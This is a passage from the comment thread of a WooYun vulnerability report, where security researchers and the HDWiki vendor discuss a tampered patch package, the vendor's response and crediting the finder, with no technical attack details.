        <span class="likepre" title="赞！" rel="19500"></span>
        <span class="liketext liketext_min"><span id="likenum_19500">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 不知道厂商愿意不愿意提供一下关于这个补丁被篡改的过程。也能方便白帽子和其他厂商学习和借鉴？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">18#</span>
                        <a title="回复 Ray" href="javascript:void(0)" class="replyBtn" onclick="Reply('Ray')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:09</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19501"></span>
        <span class="liketext liketext_min"><span id="likenum_19501">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@Ray 今天着实很郁闷，但也的确更坚定了，我相信我们官方的毅力要比攻击网站黑客的更强！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">19#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:09</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/imlonghao">imlonghao</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:740 漏洞数:75        )
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19502"></span>
        <span class="liketext liketext_min"><span id="likenum_19502">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 我想了解是内部人作案还是................. </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">20#</span>
                        <a title="回复 imlonghao" href="javascript:void(0)" class="replyBtn" onclick="Reply('imlonghao')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:12</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19503"></span>
        <span class="liketext liketext_min"><span id="likenum_19503">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@imlonghao 肯定不是内部人这点可以像大家保证。也请大家相信互动百科相信互动百科的员工。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">21#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:15</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/Ray">Ray</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:75 漏洞数:7        )
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19504"></span>
        <span class="liketext liketext_min"><span id="likenum_19504">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 那能否和我们分享一下这个黑客攻击的过程，以及你们现在采取了什么措施，达到了什么效果以避免将来再出现此类问题或者出现此类问题能及时响应？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">22#</span>
                        <a title="回复 Ray" href="javascript:void(0)" class="replyBtn" onclick="Reply('Ray')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:17</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19505"></span>
        <span class="liketext liketext_min"><span id="likenum_19505">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@胯下有杀气 我们会用更安全的方式把事情做好。的确我现咱仍然不敢斩钉截铁的说下次不会再发生，这是官方和黑客之间的战斗，我们和互动会且必须坚持到底。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">23#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:18</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/胯下有杀气">胯下有杀气</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:241 漏洞数:14        | 大姐，你黄瓜掉了。。。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19506"></span>
        <span class="liketext liketext_min"><span id="likenum_19506">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 有这个决心能付出行动就好啦，对了，这个漏洞不确认一下吗？还是等待中呢，给发现者rank奖励吧。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">24#</span>
                        <a title="回复 胯下有杀气" href="javascript:void(0)" class="replyBtn" onclick="Reply('胯下有杀气')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:22</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19507"></span>
        <span class="liketext liketext_min"><span id="likenum_19507">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>不管回复乌云也好霸气也罢，我想说这是我的一种态度，也可以说是官方的一种态度。也希望遇到问题大家能给予更多的理解和鼓励。不多说了，还是很感谢大家对HDWiki的关注和支持吧。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">25#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:24</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19508"></span>
        <span class="liketext liketext_min"><span id="likenum_19508">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@胯下有杀气 呵呵，奖励我真心可以去申请一下或者我可以自己出资奖励。这是绝对的贡献~ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">26#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:26</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19509"></span>
        <span class="liketext liketext_min"><span id="likenum_19509">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@胯下有杀气 这个问题我们的处理方案是先将补丁包重新打包确认并上传，然后去查找并修复被篡改的原因。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">27#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:29</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/胯下有杀气">胯下有杀气</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:241 漏洞数:14        | 大姐，你黄瓜掉了。。。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19510"></span>
        <span class="liketext liketext_min"><span id="likenum_19510">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 嗯，这个过程绝对正确，先控制住影响在去查后面的问题。但是我的意思是这里“细节已通知厂商并且等待厂商处理中”，是不是该在平台上确认然后进入下一步了，白帽子的rank还没拿到呢。。。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">28#</span>
                        <a title="回复 胯下有杀气" href="javascript:void(0)" class="replyBtn" onclick="Reply('胯下有杀气')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 13:32</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/zeracker">zeracker</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1077 漏洞数:139        | 爱吃小龙虾。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19512"></span>
        <span class="liketext liketext_min"><span id="likenum_19512">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>尽量避免漏洞的发生，不是有漏洞就补，一直持续下去的。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">29#</span>
                        <a title="回复 zeracker" href="javascript:void(0)" class="replyBtn" onclick="Reply('zeracker')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 14:07</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/小一">小一</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:32 漏洞数:13        )
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19517"></span>
        <span class="liketext liketext_min"><span id="likenum_19517">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>第一楼的“这些评论似乎很乌云~~~思密达”
这是什么情况？@xsser  </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">30#</span>
                        <a title="回复 小一" href="javascript:void(0)" class="replyBtn" onclick="Reply('小一')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 14:13</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/horseluke">horseluke</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:116 漏洞数:18        | Realize the dream in earnest.)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19518"></span>
        <span class="liketext liketext_min"><span id="likenum_19518">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 希望可以彻查，究竟是什么入侵渠道导致已经至少两次出现这种问题。服务器留后门？论坛最新0day？ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">31#</span>
                        <a title="回复 horseluke" href="javascript:void(0)" class="replyBtn" onclick="Reply('horseluke')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 14:13</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/疯狗">疯狗</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:44 漏洞数:2        | 阅尽天下漏洞，心中自然无码。)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19519"></span>
        <span class="liketext liketext_min"><span id="likenum_19519">1</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@小一 热门评论置顶功能 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">32#</span>
                        <a title="回复 疯狗" href="javascript:void(0)" class="replyBtn" onclick="Reply('疯狗')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 16:04</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/saviour">saviour</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:188 漏洞数:29        | Saviour.Com.Cn 网站正在备案中)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19532"></span>
        <span class="liketext liketext_min"><span id="likenum_19532">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 我觉得 我清楚黑客是怎么修改源码补丁了 你们公司漏洞真多啊 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">33#</span>
                        <a title="回复 saviour" href="javascript:void(0)" class="replyBtn" onclick="Reply('saviour')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 16:05</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/saviour">saviour</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:188 漏洞数:29        | Saviour.Com.Cn 网站正在备案中)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19533"></span>
        <span class="liketext liketext_min"><span id="likenum_19533">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 我觉得我清楚黑客是怎么修改源码补丁包了 你们公司的漏洞真是很多啊 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">34#</span>
                        <a title="回复 saviour" href="javascript:void(0)" class="replyBtn" onclick="Reply('saviour')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 17:07</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/xsser">xsser</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:297 漏洞数:22        | 当我又回首一切,这个世界会好吗?)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19539"></span>
        <span class="liketext liketext_min"><span id="likenum_19539">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 官方检查下服务器吧然后将最后查的结果处理下吧，你这样对你的代码真的不好，别人也不知道是否是被黑的还是你自己放置的吧 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">35#</span>
                        <a title="回复 xsser" href="javascript:void(0)" class="replyBtn" onclick="Reply('xsser')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 18:05</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/kindle">kindle</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:40 漏洞数:12        | hh)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19548"></span>
        <span class="liketext liketext_min"><span id="likenum_19548">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@互动在线（北京）科技有限公司 @互动在线（北京）科技有限公司 我是贴过来的，我已经删了部分不好的言论，只想官方给个解释。&quot;终于明白官方的用心了&quot;，这句话没看到，对此表示抱歉 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">36#</span>
                        <a title="回复 kindle" href="javascript:void(0)" class="replyBtn" onclick="Reply('kindle')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 18:17</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/风萧萧">风萧萧</a> <img height="12" width="12" style="vertical-align:-2px;" src="http://wooyun.org/images/v.png" alt="认证白帽子" />			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:1068 漏洞数:80        | 人这一辈子总要动真格的爱上什么人)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19550"></span>
        <span class="liketext liketext_min"><span id="likenum_19550">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@kindle 假亦真时真亦假，官方的清白是需要自己证明的！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">37#</span>
                        <a title="回复 风萧萧" href="javascript:void(0)" class="replyBtn" onclick="Reply('风萧萧')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 19:30</span> |
    		<a target='_blank' href="http://www.wooyun.org/corps/互动在线（北京）科技有限公司">互动在线（北京）科技有限公司</a>(乌云厂商)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19552"></span>
        <span class="liketext liketext_min"><span id="likenum_19552">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>@kindle 没关系，理解万岁，我们已经开始彻查相关问题了。还望大家也能给予理解，关于被黑客攻击这样的事确实很多人遇到都会比较郁闷~不过我有信心我们能做好。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">38#</span>
                        <a title="回复 互动在线（北京）科技有限公司" href="javascript:void(0)" class="replyBtn" onclick="Reply('互动在线（北京）科技有限公司')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 20:19</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/银河麒麟">银河麒麟</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 路人 |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:4 漏洞数:2        | 腾讯微博@TXisfine，欢迎交流！（关注教育...)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19554"></span>
        <span class="liketext liketext_min"><span id="likenum_19554">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>我在围观。。 </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">39#</span>
                        <a title="回复 银河麒麟" href="javascript:void(0)" class="replyBtn" onclick="Reply('银河麒麟')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-08-10 23:24</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/邻国宰相">邻国宰相</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 普通白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:138 漏洞数:33        | By:越南邻国宰相)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="19569"></span>
        <span class="liketext liketext_min"><span id="likenum_19569">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>围观中...... </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">40#</span>
                        <a title="回复 邻国宰相" href="javascript:void(0)" class="replyBtn" onclick="Reply('邻国宰相')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
                <li class="reply clearfix">
            <div class="reply-content">
                <div class="reply-info">
        <span class="addtime">2012-09-02 08:22</span> |
    		<a target='_blank' href="http://www.wooyun.org/whitehats/jxs">jxs</a>			<!-- 增加路人判断显示 @zm 2013-12-13 Begin -->
			( 实习白帽子  |			<!-- 增加路人判断显示 @zm 2013-12-13 End -->
        Rank:37 漏洞数:4        | JXS)
	
	<div class="likebox">
        <span class="likepre" title="赞！" rel="21599"></span>
        <span class="liketext liketext_min"><span id="likenum_21599">0</span></span>
        <span class="likesuf"></span>
    </div>
                </div><!-- reply-info End -->

                <div class="description">
                    <p>厂商的态度很不错的。最起码这个值得肯定！ </p>
                </div>

                <div class="replylist-act">
                		<span class="floor">41#</span>
                        <a title="回复 jxs" href="javascript:void(0)" class="replyBtn" onclick="Reply('jxs')">回复此人</a>
                </div>
            </div><!-- reply-content End -->
        </li>
            </ol><!-- replylist End -->
</div><!-- replys End -->

<div id="reply" class="reply">
<a name="comment"></a>
<p class="detail">
登录后才能发表评论，请先 <a href="http://wooyun.org/user.php?action=login"><u>登录</u></a> 。
</p>
<script type="text/javascript">
var masaic = '0';

function CommentLike(id){
	$.post("/ajaxdo.php?module=commentrating",{"id":id,"token":$("#token").val()},function(re){
		re=parseInt(re);
		switch(re){
			case 1:
				$("#likenum_"+id).html(parseInt($("#likenum_"+id).html())+1);
				break;
			case 4:
				alert(_LANGJS.COMMENT_GOOD_DONE);
				break;
			case 6:
				alert(_LANGJS.COMMENT_SELF);
				break;
			default:break;
		}
	});
}
$(document).ready(function(){
	$(".likebox .likepre").click(function(){
            CommentLike($(this).attr("rel"));
        });
});


</script>
<div>
	</div>
	<div id="footer">
        <span class="copyright fleft">
    		Copyright &copy; 2010 - 2016 <a href="wooyun-2012-010772#">wooyun.org</a>, All Rights Reserved
    		<a href="http://www.miibeian.gov.cn/">京ICP备15041338号-1</a>
    		<!--a href="http://sae.sina.com.cn" target="_blank"><img src="/images/sae_bottom_logo.png" title="Powered by Sina App Engine"></a-->
    	</span>
        <span class="other fright">
                        <a href="http://wooyun.org/impression">行业观点</a>
            · <a href="http://wooyun.org/lawer">法律顾问</a>
            · <a href="http://wooyun.org/contactus">联系我们</a>
            · <a href="http://wooyun.org/help">帮助</a>
            · <a href="http://wooyun.org/about">关于</a>
        </span>
    </div>
	<script type="text/javascript">
	var _bdhmProtocol = (("https:" == document.location.protocol) ? " https://" : " http://");
	document.write(unescape("%3Cscript src='" + _bdhmProtocol + "hm.baidu.com/h.js%3Fc12f88b5c1cd041a732dea597a5ec94c' type='text/javascript'%3E%3C/script%3E"));
	</script>
    <script type="text/javascript" id="bdshare_js" data="type=button" ></script>
    <script type="text/javascript" id="bdshell_js"></script>
    <script type="text/javascript">
        document.getElementById("bdshell_js").src = "http://bdimg.share.baidu.com/static/js/shell_v2.js?cdnversion=" + new Date().getHours();
        
        if (top.location !== self.location) top.location=self.location;
    </script>
</body>
</html>